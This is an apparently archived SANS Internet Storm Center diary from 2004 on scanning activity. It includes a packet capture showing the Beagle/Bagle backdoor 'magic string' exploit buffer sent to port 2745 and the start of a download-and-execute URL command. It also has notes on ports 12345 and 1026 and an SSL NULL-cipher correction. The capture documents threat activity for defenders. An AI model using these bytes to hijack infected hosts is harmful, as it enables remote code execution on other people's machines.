Beagle Exploit, SSL NULL encryption (update), port 12345 and 1026

Beagle Exploit, SSL NULL encryption (update), port 12345 and 1026
Beagle Virus Exploit ==================== Versions of the 'Beagle' (aka Bagle) virus open a back door on port 2745 (TCP). We do monitor increased scanning activity for this port. Today, a reader submitted a tool which is used to scan for Beagle infected systems. If the tool finds port 2745 open, it will send the 'magic string' to open the backdoor. Next, a URL is send to the system. The Bagle infected system will attempt to download the content of the URL and execute it. Sample session (using a netcat listener): 1. Establish TCP connection to port 2745 18:29:09.159691 10.1.0.129.1043 > 10.1.0.13.2745: S 2963418754:2963418754(0) win 16384 <mss 1460,nop,nop,sackOK> (DF) 0x0000 4500 0030 0084 4000 8006 e5b4 0a01 0081 E..0..@......... 0x0010 0a01 000d 0413 0ab9 b0a2 2e82 0000 0000 ................ 0x0020 7002 4000 409f 0000 0204 05b4 0101 0402 p.@.@........... 18:29:09.159784 10.1.0.13.2745 > 10.1.0.129.1043: S 3650381978:3650381978(0) ack 2963418755 win 5840 <mss 1460,nop,nop,sackOK> (DF) 0x0000 4500 0030 0000 4000 4006 2639 0a01 000d E..0..@.@.&9.... 0x0010 0a01 0081 0ab9 0413 d994 689a b0a2 2e83 ..........h..... 0x0020 7012 16d0 278f 0000 0204 05b4 0101 0402 p...'........... 18:29:09.160207 10.1.0.129.1043 > 10.1.0.13.2745: . ack 1 win 17520 (DF) 0x0000 4500 0028 0085 4000 8006 e5bb 0a01 0081 E..(..@......... 0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h. 0x0020 5010 4470 26b3 0000 0204 05b4 0101 P.Dp&......... 2. Send "exploit buffer" 18:29:09.161325 10.1.0.129.1043 > 10.1.0.13.2745: P 1:18(17) ack 1 win 17520 (DF) 0x0000 4500 0039 0086 4000 8006 e5a9 0a01 0081 E..9..@......... 0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h. 0x0020 5018 4470 ef7f 0000 43ff ffff 3030 3001 P.Dp....C...000. 0x0030 0a1f 2b28 2ba1 3201 00 ..+(+.2.. 18:29:09.161413 10.1.0.13.2745 > 10.1.0.129.1043: . ack 18 win 5840 (DF) 0x0000 4500 0028 8cbe 4000 4006 9982 0a01 000d E..(..@.@....... 0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h..... 0x0020 5010 16d0 5442 0000 0000 0000 0000 P...TB........ 3. 'reply' from infected host (just 'CR' in this case) 18:29:18.391801 10.1.0.13.2745 > 10.1.0.129.1043: P 1:2(1) ack 18 win 5840 (DF) 0x0000 4500 0029 8cbf 4000 4006 9980 0a01 000d E..)..@.@....... 0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h..... 0x0020 5018 16d0 4a39 0000 0a00 0000 0000 P...J9........ 4. send URL for download 18:29:18.393460 10.1.0.129.1043 > 10.1.0.13.2745: P 18:23(5) ack 2 win 17519 (DF) 0x0000 4500 002d 0087 4000 8006 e5b4 0a01 0081 E..-..@......... 0x0010 0a01 000d 0413 0ab9 b0a2 2e94 d994 689c ..............h. 0x0020 5018 446f 1ab8 0000 2768 7474 7046 P.Do....'http Mailbag: Port 12345 scans ========================= a user submitted logs showing large numbers of scans against port 12345 (TCP). This port is commonly associated with the trojan 'Netbus' and other malware. The log did not indicate a new tool but rather appears to be a number of sequential connect scans. Ports in focus: 1026 ==================== scans for port 1026 appear to increase again over the last couple weeks. According to some reports, this is due to popup spam, which now relies more on compromised systems as origin. http://isc.sans.org/port_details.html?port=1026 In the past, only a small number of sources originated this traffic. SSL "NULL" Encryption (Errata) ============================== An earlier diary ( http://isc.sans.org/diary.html?date=04-03-04 ) quoted Dr. Neal Krawetz, from Secure Science Corporation as saying that "One of the SSL encoding methods is "plain text". Most SSL servers have this disabled by default, but most browsers support it. When plain text is used, no central certificate authority is consulted and the user never sees a message asking if a certificate should be accepted (because "plain text" doesn't use certificates). Keeping that in mind, the little lock icon may not even indicate an encrypted channel. The little lock only indicates an SSL connection" Prompted by reader feedback, we did our own experiments, limiting an Apache 1.3 server to 'NULL' encryption. We were not able to reproduce this issue with any recent browser. Mozilla, in default configuration, will popup an error dialog stating that no common cipher could be found. If the 'null'/'plain text' encryption is specifically enabled, the page will load, but the certificate will still be validated and any errors will be communicated to the user Microsoft Internet Explorer will show a generic error page. It does not appear to be possible in MSIE 6 to enable 'NULL' encryption. --------------------------------------------- Johannes Ullrich, jullrich_AT_sans.org I will be teaching next: Application Security: Securing Web Apps, APIs, and Microservices - SANS London June 2022	Johannes 4479 Posts ISC Handler Mar 30th 2004
Thread locked Subscribe	Mar 30th 2004 1 decade ago